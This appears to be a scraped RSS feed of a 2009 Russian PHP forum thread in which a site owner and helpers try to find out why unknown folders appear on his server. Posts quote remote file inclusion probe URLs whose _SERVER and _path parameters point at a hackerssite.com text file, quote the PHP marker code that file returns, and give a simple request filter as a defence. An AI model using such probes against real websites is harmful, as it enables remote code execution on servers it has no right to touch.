http://softtime.ru/forumhttp://softtime.ru/forum/read.php?id_forum=2&id_theme=67247#post393445Я тоже так полагал :) Теперь понял, что дело, скорее всего, в моём коде. Спасибо за помощь.УязвимостьWed, 12 Aug 2009 17:00:38 +0300Axxilhttp://softtime.ru/forum/read.php?id_forum=2&id_theme=67247#post393444Я вот тоже полагал, что нереально удалённым кодом создать каталог у меня на сервере, у которого владелец апач будет. Скорее...УязвимостьWed, 12 Aug 2009 16:59:39 +0300Axxilhttp://softtime.ru/forum/read.php?id_forum=2&id_theme=67247#post393365Нет, я думаю что он сам создает каталоги только на основании того, что "url какой-то странный". Как видите, в хакерском...УязвимостьWed, 12 Aug 2009 13:05:23 +0300Lokihttp://softtime.ru/forum/read.php?id_forum=2&id_theme=67247#post393364ну почему же. Если эта строка и вправду помогает, значит атакуемому способствует какой-то Ваш код, исполняющийся ниже. Я-то полагал, что...УязвимостьWed, 12 Aug 2009 13:05:05 +0300Trianonhttp://softtime.ru/forum/read.php?id_forum=2&id_theme=67247#post393358Вы думаете он сам себе посылает эти запросы? :)УязвимостьWed, 12 Aug 2009 12:59:15 +0300Axxilhttp://softtime.ru/forum/read.php?id_forum=2&id_theme=67247#post393355Судя по всему, ваш код сам себе гадит... проверяйте логику скрипта...УязвимостьWed, 12 Aug 2009 12:56:18 +0300Lokihttp://softtime.ru/forum/read.php?id_forum=2&id_theme=67247#post393350какого скрипта? Понятно, что я могу тупо резать обращения по признаку: if(stripos($_SERVER,'_path') !== false || stripos($_SERVER,'_SERVER') !== false){ exit; }...УязвимостьWed, 12 Aug 2009 12:49:42 +0300Axxilhttp://softtime.ru/forum/read.php?id_forum=2&id_theme=67247#post393349something.txt выдаёт всякую фигню по типу: "?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?" Я так понимаю реальный...УязвимостьWed, 12 Aug 2009 12:48:41 +0300Axxilhttp://softtime.ru/forum/read.php?id_forum=2&id_theme=67247#post393347"Анализ выявил, что создают их путём модификации урла: При этом содержимое Вашего скрипта никак не влияет на процесс атаки?УязвимостьWed, 12 Aug 2009 12:48:07 +0300Trianonhttp://softtime.ru/forum/read.php?id_forum=2&id_theme=67247#post393343логично было бы начать с изучения something.txtУязвимостьWed, 12 Aug 2009 12:37:54 +0300Lokihttp://softtime.ru/forum/read.php?id_forum=2&id_theme=67247#post393312Создаётся. Только я технологию этого дела понять не могу :( Если бы это был внедрённых скрипт, то все обращения бы...УязвимостьWed, 12 Aug 2009 11:31:33 +0300Axxilhttp://softtime.ru/forum/read.php?id_forum=2&id_theme=67247#post393254А если самому запустить? Создадутся? Тогда и отлаживать полегче будет...УязвимостьWed, 12 Aug 2009 01:28:57 +0300Евгений Петровhttp://softtime.ru/forum/read.php?id_forum=2&id_theme=67247#post393188Да PS. На сервере стоит PHP 5.2УязвимостьTue, 11 Aug 2009 18:20:49 +0300Axxilhttp://softtime.ru/forum/read.php?id_forum=2&id_theme=67247#post393184a register_globals выключен?УязвимостьTue, 11 Aug 2009 18:11:10 +0300Trianonhttp://softtime.ru/forum/read.php?id_forum=2&id_theme=67247#post393182В корне сайта стали появляться левые папки. Анализ выявил, что создают их путём модификации урла: http://www.mysite.com/some/path////?_SERVER=http://www.hackerssite.com//something.txt? Есть варианты: http://www.mysite.com/some/path/config.inc.php/?_path=http://www.hackerssite.com//something.txt? Но...УязвимостьTue, 11 Aug 2009 18:04:30 +0300Axxil